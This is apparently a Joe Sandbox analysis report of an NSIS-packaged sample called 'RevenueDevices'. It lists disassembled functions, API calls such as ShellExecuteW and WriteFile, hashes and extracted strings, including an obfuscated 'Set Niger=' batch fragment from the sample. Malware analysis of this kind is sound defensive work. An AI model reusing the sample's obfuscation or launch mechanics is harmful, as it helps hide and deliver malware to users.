                                          • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                          • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                          • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                          • API String ID: 608394941-1650083594
                                          • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                          • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                          • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                          Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          • lstrcatW.KERNEL32(00000000,00000000,%NodeTransexual%,004CB0B0,00000000,00000000), ref: 00401A76
                                          • CompareFileTime.KERNEL32(-00000014,?,%NodeTransexual%,%NodeTransexual%,00000000,00000000,%NodeTransexual%,004CB0B0,00000000,00000000), ref: 00401AA0
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                          • String ID: %NodeTransexual%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                          • API String ID: 4286501637-2490022183
                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                          Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00403598
                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                          Strings
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                          • Null, xrefs: 0040367E
                                          • soft, xrefs: 00403675
                                          • Error launching installer, xrefs: 004035D7
                                          • Inst, xrefs: 0040366C
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                          • API String ID: 4283519449-527102705
                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                          Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 004033E7
                                          • GetTickCount.KERNEL32 ref: 00403464
                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                          • wsprintfW.USER32 ref: 004034A4
                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                          Strings
                                          • X1C, xrefs: 0040343C
                                          • ... %d%%, xrefs: 0040349E
                                          • Set Niger=gMoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-lMAAlien-UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-lNCompleted-KRuxInjection-Med-HeTft-Crazy-Sh, xrefs: 004033A9
                                          • X1C, xrefs: 004033ED
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: CountFileTickWrite$wsprintf
                                          • String ID: ... %d%%$Set Niger=gMoAEngineer-Hdtv-Register-Usda-Supported-Mount-Soma-Annotation-Guard-lMAAlien-UKWPostposted-Kuwait-Al-Jennifer-Specialists-Expressions-bdPassive-Advertisers-Further-Unsubscribe-Drivers-Disco-lNCompleted-KRuxInjection-Med-HeTft-Crazy-Sh$X1C$X1C
                                          • API String ID: 651206458-337224829
                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                          Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                          APIs
                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                          • String ID:
                                          • API String ID: 2740478559-0
                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                          Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 750 4030e3-4030f2 734->750 751 402387-40238d GlobalFree 734->751 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 747->750 763 402708-40270e 748->763 751->750 763->750
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • GlobalFree.KERNELBASE(007ADB60), ref: 00402387
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FreeGloballstrcpyn
                                          • String ID: %NodeTransexual%$Exch: stack < %d elements$Pop: stack empty
                                          • API String ID: 1459762280-4090470853
                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD
                                          Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 777 402369-402381 call 405f51 * 2 773->777 774->769 777->774
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                          • GlobalFree.KERNELBASE(007ADB60), ref: 00402387
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 3376005127-0
                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19
                                          Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                          • String ID:
                                          • API String ID: 2568930968-0
                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68
                                          Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                          APIs
                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106522068.00000000004F4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_86_2_400000_RevenueDevices.jbxd
                                          Similarity
                                          • API ID: PrivateProfileStringWritelstrcpyn
                                          • String ID: %NodeTransexual%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                          • API String ID: 247603264-375107294
                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                          Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                          APIs
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                          Strings
                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                          Memory Dump Source
                                          • Source File: 00000056.00000002.3106329591.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000056.00000002.3106301320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106367887.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000040B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.000000000041F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                          • Associated: 00000056.00000002.3106396734.0000000000461000.00000004.00000001.01000000.00000009.sdmpDownload File
